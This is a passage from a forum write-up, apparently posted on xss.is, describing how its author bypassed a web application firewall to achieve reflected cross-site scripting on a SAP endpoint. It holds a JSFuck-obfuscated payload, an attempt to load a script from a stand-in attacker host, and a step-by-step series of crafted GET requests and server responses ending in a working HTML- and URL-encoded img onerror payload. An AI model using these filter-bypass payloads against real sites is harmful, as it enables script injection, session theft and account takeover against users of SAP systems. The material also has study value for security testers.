+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]](!+[]+!+[]+!+[]+[!+[]+!+[]])+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]])()((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[+!+[]+[!+[]+!+[]+!+[]]]+[+!+[]]+([+[]]+![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[!+[]+!+[]+[+[]]])>">
</head>
<body>
</body>
</html>

Image [2]
​

So we understand that JSFuck works, now time for second approach. Second approach is to start http server with file 1.JS, i used number as 1, because numbers can't be uppercased and uppercase of .js is .JS

Image [3]​

So now my request is:
Код: Скопировать в буфер обмена
GET /SAPIrExtHelp/random/SAPIrExtHelp/random/"><script%20src=http://xacker.mamkin/1.JS>.asp HTTP/2
The response is:
Код: Скопировать в буфер обмена

<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">
<meta http-equiv="refresh"      content="0; URL=/SAPIKS2/logonFromUrl.sap?null&_CLASS=RANDOM/SAPIREXTHELP/RANDOM/"><SCRIPT SRC=HTTP:/XACKER.MAMKIN/1.JS>">
</head>
<body>
</body>
</html>

As you can see there is 1 slash, it is http:/ instead of http://, I tried multiple bypass methods they didn't work. So I will leave this approach and try to use more simple approaches. BTW, when I open script tag, there is no 403, the 403 error comes when I close the tag. Well now I can use html encoding, my request is:
Код: Скопировать в буфер обмена
GET /SAPIrExtHelp/random/SAPIrExtHelp/random/"><img/src=x/onerror=&#112;&#114;&#105;&#110;&#116;(1)>.asp HTTP/2
The response i got is
Код: Скопировать в буфер обмена
HTTP/2 404 Not Found
So why did I get a 404? semicolon ( ; ) isn't a special character, I tried to urlencode it and send a request in that way but response still was 404. I think that the server/web application can be configured to handle semicolons in a specific way, and this configuration may result in a 404 error for semicolon-containing URLs, regardless of encoding. Now to understand what is happening here, I will start from scratch
200 OK
Код: Скопировать в буфер обмена
GET /SAPIrExtHelp/random/SAPIrExtHelp/random/">.asp HTTP/2
404 Not Found
Код: Скопировать в буфер обмена
GET /SAPIrExtHelp/random/SAPIrExtHelp/random/">.asp HTTP/2
200 OK / But the response is not decoded, it is &QUOT&GT
Код: Скопировать в буфер обмена
GET /SAPIrExtHelp/random/SAPIrExtHelp/random/&quot&gt.asp HTTP/2
Maybe I should use numeric entities?
404 Not Found
Код: Скопировать в буфер обмена
GET /SAPIrExtHelp/random/SAPIrExtHelp/random/">.asp HTTP/2
What if I remove the ;
200 OK, Okay this one seems to be working.
Код: Скопировать в буфер обмена
GET /SAPIrExtHelp/random/SAPIrExtHelp/random/&#34&#62.asp HTTP/2

Now I will go back and encode what I have to in correct way
Код: Скопировать в буфер обмена
GET /SAPIrExtHelp/random/SAPIrExtHelp/random/"><img/src=x/onerror=&#112&#114&#105&#110&#116(1)>.asp HTTP/
If I have 200 OK, maybe the issue is with img tag:
Код: Скопировать в буфер обмена
GET /SAPIrExtHelp/random/SAPIrExtHelp/random/"><img%20src=x%20onerror=&#112&#114&#105&#110&#116(1)>.asp HTTP/2
It worked, that's great! But the issue here is that HTML Encoded part should be also URL Encoded, otherwise & will be considered as special character. So the final request will be:
Код: Скопировать в буфер обмена
GET /SAPIrExtHelp/random/SAPIrExtHelp/random/"><img%20src=x%20onerror=%26%23112%26%23114%26%23105%26%23110%26%23116(1)>.asp HTTP/2
Response:
Код: Скопировать в буфер обмена

<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">
<meta http-equiv="refresh"      content="0; URL=/SAPIKS2/logonFromUrl.sap?null&_CLASS=RANDOM/SAPIREXTHELP/RANDOM/"><IMG SRC=X ONERROR=&#112&#114&#105&#110&#116(1)>">
</head>
<body>
</body>
</html>

Image [4]​

My payload was to print xD

As result now we have a better payload than what it was in nuclei, because our one encodes what is needed, not everything.
P.S. Tested with permission obviously.

Автор grozdniyandy​

Источник https://xss.is/​